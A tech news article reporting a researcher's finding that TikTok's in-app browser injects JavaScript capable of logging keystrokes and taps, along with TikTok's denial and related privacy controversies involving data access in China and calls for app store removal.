Here's How TikTok Silently Monitors Your Web Activity

TikTok has mired itself in another controversy, one that puts it in the same infamous lane of surreptitiously tracking users across the web as rivals platforms like Instagram and Facebook. According to an analysis by security researcher Felix Krause, the TikTok app's web browser is capable of logging all the keyboard inputs, potentially giving it access to sensitive information like log-in credentials alongside a track of what websites users visit and what they do on those web pages.

When you click a link while surfing the TikTok app, it opens inside a native web view that serves as TikTok's own basic web browser. Not every app does that. Take for example WhatsApp. When you click on a URL shared on the messaging app, it automatically opens it in the default web browser on your phone, which can be anything from Chrome to Safari. 

TikTok is not alone in offering a native browser experience, but there is something potentially nefarious embedded in the code. According to Krause, TikTok's in-app browser has JavaScript command lines that allow it to log every keystroke when users are checking out a website. That means every keyboard input, from messages to log-in credentials, can be recorded. 

A hollow clarification

Keystroke logging is one of the most widely abused techniques for stealing sensitive information, which makes one wonder why a social media app like TikTok is using that code for its in-app web browser. Aside from keystroke tracking, TikTok's in-app browser is also capable of recording all on-screen input. The app is capable of recording each image you click, each button you tap, and each URL you interact with in the TikTok web browser.

All that is done using a custom JavaScript function. TikTok representatives have denied allegations of tracking users but admit that the JavaScript code for the aforementioned activities is indeed a part of the in-app browser experience. However, the explanation for why those questionable features are bundled with its in-app web browser sounds rather odd. 

In an official statement shared with Forbes, a TikTok spokesperson mentioned that the controversial JavaScript code is there for "debugging, troubleshooting and performance monitoring" of the web experience offered by the in-app browser. 

It is worth noting here that Krause doesn't claim he's found evidence that TikTok is abusing the feature to track users, nor proof of if that valuable data is shared with third parties. At the same time, as Krause told Forbes, "this does not happen by mistake or randomly."

Shaky history of privacy

Interestingly, out of the seven apps tested as part of a research project conducted by Krause, TikTok was found to be the only one discovered to be capable of logging keystrokes. TikTok also emerged as the app that monitors the widest range of user activities — more than Facebook, Instagram, Amazon, and Snapchat. 

It's also difficult to take TikTok's statements at face value. A bombshell BuzzFeed investigation recently revealed that data of U.S. users was accessed in China, despite the company repeatedly claiming otherwise in the past. Following the BuzzFeed report, which cited leaked internal audio recordings, TikTok announced that it was moving all American user data to servers located on U.S. soil, thanks to a partnership with Oracle. TikTok is already banned in India over national security concerns and narrowly avoided a ban in the U.S. over similar concerns not too long ago.

In June 2022, FCC Commissioner Brendan Carr asked Google and Apple to remove TikTok from the Play Store and App Store, respectively, over security due to alleged ties with the Chinese government. Carr mentioned in an open letter that sensitive user data is being accessed in China. Michael Beckerman, head of TikTok's public policy for the U.S. market, denied those claims in a CNN interview.